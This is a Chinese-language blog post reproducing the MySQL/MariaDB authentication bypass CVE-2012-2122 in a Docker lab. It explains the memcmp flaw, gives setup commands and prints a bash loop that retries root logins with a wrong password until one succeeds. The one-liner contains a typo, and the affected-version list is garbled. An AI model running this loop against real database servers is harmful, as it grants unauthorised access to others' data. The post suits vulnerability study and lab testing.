Mysql 身份认证绕过漏洞（CVE-2012-2122）

当连接MariaDB/MYSQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。

受影响版本：

• MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
• MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

环境搭建

cd mysql/CVE-2012-2122
docker-compose up -d
docker-compose config

环境启动后，将启动一个mysql服务（版本：5.5.23），监听3306端口，通过正常的mysql客服端，可以直接登录的，正确root密码是123456


连接成功！

漏洞验证

在不知道我们环境正确密码的情况下，在bash下运行如下命令，在一定数量尝试后便可成功登录：

for i  in `seq 1 1000`;do mysql -uroot =pwrong -h 10.10.10.10 -P3306;done

更多方法，自己体会！！！

本栏目推荐文章
• openpyxl模块---------------------------------------------提取身份证信息及计算年龄
• Jmeter 如何连接mysql数据库？
• 如何通过Navicat把MySQL远程数据库导入到本地数据库
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 【LeetCode 2701. 连续递增交易】MySQL用户变量编程得到严格递增连续子序列的开始位置，结束位置，长度等统计信息
• 【Leetcode 2474. 购买量严格增加的客户】MySQL用户变量编程解决严格递增连续子序列问题
• mysql发生连接异常Cause: com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure
• 【LeetCode 2494. 合并在同一个大厅重叠的活动】MySQL用户变量编程解决区间合并问题
• 如何处理Mysql死锁
• 【LeetCode1747. 应该被禁止的 Leetflex 账户】MySQL用户变量编程；尝试维护一个multiset

漏洞 身份 Mysql 2012 2122漏洞 身份mysql 2012 漏洞 未经 身份 代码 2122 漏洞 身份smanga 36079 漏洞 身份 关键 版本 身份认证 漏洞superset身份 密钥 身份认证 漏洞 身份 漏洞 身份认证openfire身份 漏洞 身份认证 身份nacos 身份认证 漏洞security身份